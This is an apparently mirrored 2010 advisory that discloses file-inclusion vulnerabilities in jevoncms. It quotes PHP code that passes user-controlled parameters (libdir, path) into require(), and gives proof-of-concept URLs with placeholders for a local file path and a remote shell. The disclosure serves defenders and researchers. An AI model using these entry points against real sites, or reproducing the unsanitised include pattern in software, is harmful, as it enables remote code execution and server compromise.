jevoncms (LFI/RFI) Multiple Vulnerabilities

2010-04-0500:00:00

vulners.com

789

JSON

########################################################
jevoncms (LFI/RFI) Multiple Vulnerabilities
########################################################

[+]Title : jevoncms (libdir) Multiple Vulnerability
[+]Version: -
[+]Download: http://sourceforge.net/projects/jevoncms/files/
[+]Author: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com

    [!]Thank&#96;s To: all friends

########################################################

    -=[ Vuln C0de ]=-

[-] jevoncms/php/main/jevoncms.php

$_PHPLIB["libdir"] = "phplib/";
require($_PHPLIB["libdir"] ."template.inc"); /* Disable this, if you are not using templates. */
require("template/jvc_template.php");
require("php/main/database/jvc_Database.php");

[-] jevoncms/php/main/template/jvc_template.php

if($type!=$lasttype && $type!=''){
$path= "php/".$type."/".$type.".php" ;
// echo $path;
require($path);

[-] jevoncms/php/menu/menu.php

//require($_PHPLIB["libdir"] ."template.inc"); /* Disable this, if you are not using templates. */

    -=[ Proof Of Concept ]=-


    http://127.0.0.1/jevoncms/php/main/jevoncms.php?libdir=[lfi]

    http://127.0.0.1/jevoncms/php/main/template/jvc_template.php?path= [rfi shell]

    http://127.0.0.1/jevoncms/php/menu/menu.php?libdir=[lfi]

######################=[E0F]=#############################

JSON

jevoncms &#40;LFI/RFI&#41; Multiple Vulnerabilities

jevoncms (LFI/RFI) Multiple Vulnerabilities